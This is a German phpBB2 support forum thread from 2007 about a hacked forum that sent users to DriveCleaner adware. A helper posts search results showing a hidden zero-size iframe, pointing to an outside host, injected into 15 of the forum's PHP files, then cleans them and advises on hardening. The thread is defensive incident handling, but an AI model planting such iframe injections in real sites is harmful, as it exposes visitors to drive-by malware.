phpBB2.de Foren-Übersicht  
[netclusive - internet broadcasting]
 FAQ  •  Suchen  •  Download  •  Lesezeichen  •  Mitgliederliste  •  Benutzergruppen   •  Registrieren  •  Profil  •  Einloggen, um private Nachrichten zu lesen  •  Login
 
        
 
        
 

LinkLift

Nächstes Thema anzeigen
Vorheriges Thema anzeigen

Dieses Forum ist gesperrt, du kannst keine Beiträge editieren, schreiben oder beantworten.Dieses Thema ist gesperrt, du kannst keine Beiträge editieren oder beantworten.
Autor Nachricht
loopy83
phpBB2.de User
phpBB2.de User



Anmeldungsdatum: 19.12.2005
Beiträge: 23

BeitragVerfasst am: Mo 28 Mai, 2007 20:02 Antworten mit ZitatNach oben 

Hallo,

seit einiger Zeit habe ich Probleme mit meinem Forum:
http://www.wodkaenergy.de/phpBB2/

Und zwar werden meine User und teiweise auch ich auf eine Seite weitergeleitet, wo mit DriveCleaner oder sowas geworben wird und auch gleich ein Downlaod startet. Das ist sehr nervig. Wobei die Weiterleitung bis jetzt noch ohne erkennbares Muster auftritt.... also sie kommen eher selten....

Seit neustem meldet mein Antivir und auch Kaspersky, das die Seite ein schädliches Script ethält.... also wie eine Virenwarung.
Hier mal die Fehlermeldung:
Image

Wo kann ich nachschauen, was hier verändert wurde, oder ob überhaupt was verändert wurde.... ich habe leider nur Grundkenntnisse in html und php.... also so ein komplexe Sache wie das Forum durchschaue ich noch lange nicht Sad

Kann mir jemand einen Rat geben oder hatte schon mal ähnliche Probleme?

DANKE
OfflineBenutzer-Profile anzeigenPrivate Nachricht sendenICQ-Nummer
Google







Verfasst am: Nach oben

coolsoft
phpBB2.de User
phpBB2.de User



Anmeldungsdatum: 09.11.2005
Beiträge: 5498
Wohnort: deep in the south (G)

BeitragVerfasst am: Di 29 Mai, 2007 00:50 Antworten mit ZitatNach oben 

hmm - eigentlich habt ihr euch gegenseitig mit einem trojaner infiziert.
Zitat:

ich habe es geschaft den "virus" zu löschen. das programm heißt ad-aware se profesional. hat die adware gefunden und gelöscht. seit dem ist das problem gegessen. keine nervigen meldungen mehr von drivecleaner und co... und alles ohne formatieren. in diesem sinne:


aus dem thread / forum:

http://forum.banni1959.de/viewtopic.php?t=1758

ich hab aber bei Zugriff auch diesen drivecleaner zu sehen bekommen (übel)
kann ja mal per ftp nachsehen bei Dir (Zugang per pn)
- index[1].php gibts eigentlich nur bei der quelltextansicht!

_________________
°
*** upgrade zu phpbb3 / Migration - bei Interesse bitte PN ***
*** phpBB3 plus slimline (free) ***
*** phpBB3 plus light mit Portal, Download, Gallery codebase 3.0.6 (25 EUR) ***
== Support für Fortgeschrittene / experienced users support
kein Support via PN
HiddenBenutzer-Profile anzeigenPrivate Nachricht sendenWebsite dieses Benutzers besuchen
coolsoft
phpBB2.de User
phpBB2.de User



Anmeldungsdatum: 09.11.2005
Beiträge: 5498
Wohnort: deep in the south (G)

BeitragVerfasst am: Di 29 Mai, 2007 01:07 Antworten mit ZitatNach oben 

hab prompt beim download mit ie6 von adaware SE beim chip server eine 'um die Ohren' bekommen. also nimm das Forum am besten per ftp vom netz - bevor noch weitere infiziert werden.
(ordner umbenennen)
Sad

_________________
°
*** upgrade zu phpbb3 / Migration - bei Interesse bitte PN ***
*** phpBB3 plus slimline (free) ***
*** phpBB3 plus light mit Portal, Download, Gallery codebase 3.0.6 (25 EUR) ***
== Support für Fortgeschrittene / experienced users support
kein Support via PN
HiddenBenutzer-Profile anzeigenPrivate Nachricht sendenWebsite dieses Benutzers besuchen
coolsoft
phpBB2.de User
phpBB2.de User



Anmeldungsdatum: 09.11.2005
Beiträge: 5498
Wohnort: deep in the south (G)

BeitragVerfasst am: Di 29 Mai, 2007 16:06 Antworten mit ZitatNach oben 

für alle:
Zitat:

common.php(243): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
config.php(1Cool: ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
faq.php(150): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
groupcp.php(1284): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
index.php(470): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
login.php(305): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
memberlist.php(312): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
modcp.php(1256): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
posting.php(1156): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
privmsg.php(2210): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
profile.php(124): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
search.php(1453): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
viewforum.php(696): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
viewonline.php(289): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
viewtopic.php(1226): ?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Es wurden 15 Vorkommen in 15 Datei(en) gefunden.


da wird wohl eine passwortÄnderung für alle Zugänge fällig und eine .htacces
(die fehlt)
+ scharfSchaltung des ctracker

_________________
°
*** upgrade zu phpbb3 / Migration - bei Interesse bitte PN ***
*** phpBB3 plus slimline (free) ***
*** phpBB3 plus light mit Portal, Download, Gallery codebase 3.0.6 (25 EUR) ***
== Support für Fortgeschrittene / experienced users support
kein Support via PN
HiddenBenutzer-Profile anzeigenPrivate Nachricht sendenWebsite dieses Benutzers besuchen
coolsoft
phpBB2.de User
phpBB2.de User



Anmeldungsdatum: 09.11.2005
Beiträge: 5498
Wohnort: deep in the south (G)

BeitragVerfasst am: Di 29 Mai, 2007 16:25 Antworten mit ZitatNach oben 

hab die Dateien alle bereinigt, testweise Forum aktiviert,
funzt - zumindest für Gast
deaktiviere das Board nun wieder -
selber freischalten Wink

PS: nu dürfen mal alle ihren Computer durchsuchen, die OK oder Abbrechen gedrückt haben

Infektion am 20.05. alle php-Files im Root

_________________
°
*** upgrade zu phpbb3 / Migration - bei Interesse bitte PN ***
*** phpBB3 plus slimline (free) ***
*** phpBB3 plus light mit Portal, Download, Gallery codebase 3.0.6 (25 EUR) ***
== Support für Fortgeschrittene / experienced users support
kein Support via PN
HiddenBenutzer-Profile anzeigenPrivate Nachricht sendenWebsite dieses Benutzers besuchen
Beiträge der letzten Zeit anzeigen:      
Dieses Forum ist gesperrt, du kannst keine Beiträge editieren, schreiben oder beantworten.Dieses Thema ist gesperrt, du kannst keine Beiträge editieren oder beantworten.

Nächstes Thema anzeigen
Vorheriges Thema anzeigen
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Du kannst Dateien in diesem Forum posten
Du kannst Dateien in diesem Forum herunterladen

Ähnliche Beiträge
Thema Autor Forum Antworten Verfasst am
Forum gehackt!!!! chewbacca Support allgemein 0 Mo 24 Aug, 2009 23:37 Letzten Beitrag anzeigen
gehackt??? monstereddie phpBB2.x - Support 1 Sa 15 Aug, 2009 23:58 Letzten Beitrag anzeigen
smf Forum zu phpBB2 - ich brauche Hil... Maggan22 phpBB2.x - Installation 1 Sa 01 Aug, 2009 16:17 Letzten Beitrag anzeigen
1 forum 2 domains Nanakie phpBB2.x - Support 0 Fr 24 Jul, 2009 15:44 Letzten Beitrag anzeigen
nach login geht forum _parent auf obbi phpBB2.x - Support 0 Do 23 Jul, 2009 11:13 Letzten Beitrag anzeigen